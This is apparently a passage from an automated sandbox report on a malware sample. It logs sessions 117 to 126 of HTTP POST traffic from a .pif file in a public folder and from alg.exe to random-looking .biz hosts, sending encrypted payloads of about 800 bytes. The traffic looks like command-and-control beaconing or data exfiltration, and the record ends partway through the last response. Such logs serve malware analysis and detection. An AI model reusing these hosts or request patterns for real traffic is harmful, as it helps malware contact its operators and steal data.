                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        117192.168.2.84990218.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.899763107 CET360OUTPOST /vhecjxbkixjuljyp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.899786949 CET802OUTData Raw: e5 67 01 41 06 1d d4 29 16 03 00 00 93 76 b2 3e a9 aa 16 b5 79 cf 5b a5 4d 2f 6a 29 49 08 8b 99 6b c3 b9 01 b8 de fa 4b ae 96 c3 7a 3c c8 f3 5a 2f c1 96 c2 c4 d1 be bf 27 6a 4a 2d 0b d6 a3 c7 7c 36 98 51 cc ab a1 df a5 b3 a7 b5 0b 81 c7 e0 80 e2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: gA)v>y[M/j)IkKz<Z/'jJ-|6QzEAn<9>a&1G6 ('f>@sf+ "Y;U*d?IoC{DN_} 'h:*(nc7H`*Ek3GR(GoN;|9XcsF_NDn
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.328772068 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dd5477077425b53d220a696663d421db|173.254.250.82|1730445885|1730445885|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        118192.168.2.84991234.246.200.160804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.392642021 CET355OUTPOST /cgkctkdxtvumt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.392669916 CET802OUTData Raw: 88 ff ea e4 b2 48 f5 50 16 03 00 00 7b 74 d0 7a 25 f4 88 b4 b9 a3 ed b7 1d 88 20 83 14 8f 54 56 42 d0 cf 97 40 40 15 eb f3 a7 98 35 e6 18 2b 9d 22 1e 45 5f f3 7f 2e 6c e2 0b c6 4d e0 16 cc 0d a7 64 70 62 75 28 ee 29 cf e0 15 5f 57 87 77 d1 76 dd
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: HP{tz% TVB@@5+"E_.lMdpbu()_Wwvx"1U,`?t.=bgbQZIUOk)ucAk%e_+?H =-+|jsla|}HM7&6l1-UO?%{Z3xIgP9{
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.357059002 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=cf417fce9c2b360d5f08719d4d55f4a0|173.254.250.82|1730445886|1730445886|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        119192.168.2.84991334.211.97.45804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.410393000 CET357OUTPOST /nmqrslobvguxfrkm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.410423040 CET778OUTData Raw: 95 00 98 3c 3e da cd 93 fe 02 00 00 96 4a 5c 89 f6 52 8c c7 84 16 29 aa 40 97 30 db a8 fd 9c ef d2 4a 68 e6 a9 7a 49 f1 a8 62 91 81 09 ad 61 03 8f 2e d1 23 55 1e b3 55 84 8c 99 5d 3d a3 fd e8 22 81 b2 1d f1 f8 cb b7 ca 77 9e ff 32 7c 9e 1b 6f 9b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <>J\R)@0JhzIba.#UU]="w2|oj?XcST3rrRTT}Qk,%u?J)A2-bjD3ySp<*#UbfMYT]8.Kzn\RMAn5&vkvTnh
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.298280954 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c594b70995f3bd9af54585365a284752|173.254.250.82|1730445886|1730445886|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        120192.168.2.84991947.129.31.212804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.414691925 CET353OUTPOST /esgffqvf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.414838076 CET802OUTData Raw: e5 15 42 b2 e7 68 76 ca 16 03 00 00 ef b1 69 51 bd 9e a3 2b 65 a7 43 d3 c2 a3 0d bd b0 9d 0d e5 d3 d6 0a a3 5e 74 90 8a eb 29 8a b5 bf 05 4d f1 04 44 bd d1 08 be 48 38 04 16 b3 ff 24 78 36 b3 53 b0 a0 89 e7 56 d7 c8 3c 59 53 9e ee 87 59 b4 ec b6
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: BhviQ+eC^t)MDH8$x6SV<YSY1&{|uH+T:)kmp;g+QuZ^X\R|h8up~;sVrU@mI%gy| /o3'Wo&Z:V7E-7M
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.873754978 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=86f91e0ce0e364c3d12aa05e351fcaf5|173.254.250.82|1730445887|1730445887|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        121192.168.2.84992047.129.31.212804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.493212938 CET352OUTPOST /eviqjrwjsc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.493212938 CET778OUTData Raw: a1 45 de 37 b5 cb 44 5b fe 02 00 00 b6 20 b1 b9 66 60 c7 b1 e0 f1 19 ef ab 79 32 b4 da 4d 9f a1 10 ab b5 ba da 1a f0 20 3c 93 20 34 32 dd 89 cc 54 17 f9 cd cd 34 d3 0a 5d 7b 59 7e 8f 6d cc 0d 76 5e 1f 62 83 e1 00 ab a6 0e f4 4a 88 92 40 fd 18 d3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E7D[ f`y2M < 42T4]{Y~mv^bJ@UR0Ns@Hr[Rf9#$"u$Brm:/v@o&"vTjLB(Sq}pnN/smB^H8zCQ*:;vgx[L-^2MFczi@P]}fbD[fSihBd
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.961424112 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5db6436a254bba99f8e92f4fd786394f|173.254.250.82|1730445887|1730445887|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        122192.168.2.8499303.94.10.34804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.945707083 CET351OUTPOST /xyrpanl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.945744038 CET802OUTData Raw: 95 ae f4 a2 83 cd 1c dc 16 03 00 00 f8 fe 50 ed 4a 63 cc 2d 56 d1 7c 9b 88 de ff fd 7f aa 7e de 2f 97 ce bc 2f 5d 53 68 76 36 66 b6 f7 b5 d4 e7 21 61 ad 8c 04 05 52 86 fc 0e 90 52 e5 a7 4e 93 8a f0 fb e5 a1 86 5e ec 94 a4 c3 12 fa a3 e4 af be f8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PJc-V|~//]Shv6f!aRRN^P\~k2>spZo5U5 /yMY_B2Z ~#M.Vg:l`6{%\'a"l)p2C2#1#=u+y"]U+qNqxeH>
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.608784914 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fae0247717672aee1c1c31272378237e|173.254.250.82|1730445888|1730445888|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        123192.168.2.84993218.208.156.248804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.240483999 CET355OUTPOST /aoayitmlcu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.240516901 CET778OUTData Raw: 3c 1f cf 65 a4 10 c2 79 fe 02 00 00 2b 46 93 bd 0e 84 db ef b4 b1 8e 1e 0a b9 15 1a b3 5d 4e e0 34 ac 8c 2b 48 2f 76 77 29 a2 08 cb ab d2 a5 71 b4 c7 eb 31 ca f4 16 45 b7 db bd 6a 7a 4b 31 14 32 70 83 9e a7 15 9b f7 37 bc c1 82 81 7e b6 e2 4c 1b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <ey+F]N4+H/vw)q1EjzK12p7~L73tv74#5Q$=eAt(ITH-~ 2Q\pk]:,@u"A?D?<K}|(e2j5W_qh*DmxX$zQi
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.912839890 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=366c8ab7eacc65c11dd69709049f8486|173.254.250.82|1730445888|1730445888|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        124192.168.2.84993735.164.78.200804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.723855972 CET354OUTPOST /ceercoregt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.723880053 CET802OUTData Raw: c7 ca 69 46 73 ce 8b 9c 16 03 00 00 d9 4f 6a 4f 8f 6b da 6b 66 8c bc d2 04 c8 a3 e8 46 05 7d 07 1e 72 2e 14 90 bd 98 a9 cd de f5 23 a2 f2 ab 4c 18 07 62 2b 7a d3 e4 13 7b 27 90 4e 69 59 0a 9b c0 73 68 f9 33 9d d2 d3 28 c9 dc 73 78 4a 94 21 10 87
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: iFsOjOkkfF}r.#Lb+z{'NiYsh3(sxJ!M*RYA1j`z@?xs1m*ZCoO7Nq"Ju2$2"D60SYbzjCI30B9ZyPQMr]Te)KSKo
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.855303049 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a43794c3dcdcb55128637cedb8e8df09|173.254.250.82|1730445889|1730445889|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        125192.168.2.84993913.251.16.150804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.103034019 CET355OUTPOST /xgyulldvremqd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:49.103063107 CET778OUTData Raw: b1 3e 5a ec f8 3c 25 7e fe 02 00 00 18 18 e7 2a 9e fd bb 04 78 11 bf 23 ff 5b bd 75 a3 f7 f1 d9 b0 fb 7a de 39 b3 e1 1c db be 73 5e 4a f5 79 08 07 21 6b 44 6c b3 f2 81 5f f1 e1 dc d7 02 f5 a2 d3 c2 d4 ca ad ca 7e 05 74 34 a1 e6 ef a9 1c e8 ff fb
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >Z<%~*x#[uz9s^Jy!kDl_~t4$?+3~V'/)O3\KcXc+jwtR4FwDi v^)})nGn'IwOyE?9K}~_A#y0l Vat;CbFk
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.536510944 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=83fe2dbfa7df9ed83ac9527f07d6eba7|173.254.250.82|1730445890|1730445890|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        126192.168.2.84994918.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.374330044 CET355OUTPOST /jhppqdqsxkpre HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.374361038 CET802OUTData Raw: 36 b0 35 3c 17 a4 d0 40 16 03 00 00 5d f9 a6 91 f2 98 c0 f1 3d ca 96 e9 39 2a e7 3a 48 4b 4b 8a de 49 7a d7 7f 25 d8 3a e2 df 8c 00 ed 46 9c 2d 82 d9 8e c3 80 94 f7 b3 77 6e 94 b5 a9 6d dc 36 ee d6 e3 12 41 64 06 89 9e 39 b2 47 9c 04 68 9f 30 b0
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 65<@]=9*:HKKIz%:F-wnm6Ad9Gh0pFBYnn?yRz'Z`VDIs\<L!'$C%go\$ g_SVPla5n9kJSh+<=4*?bggn8rL]
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.808725119 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
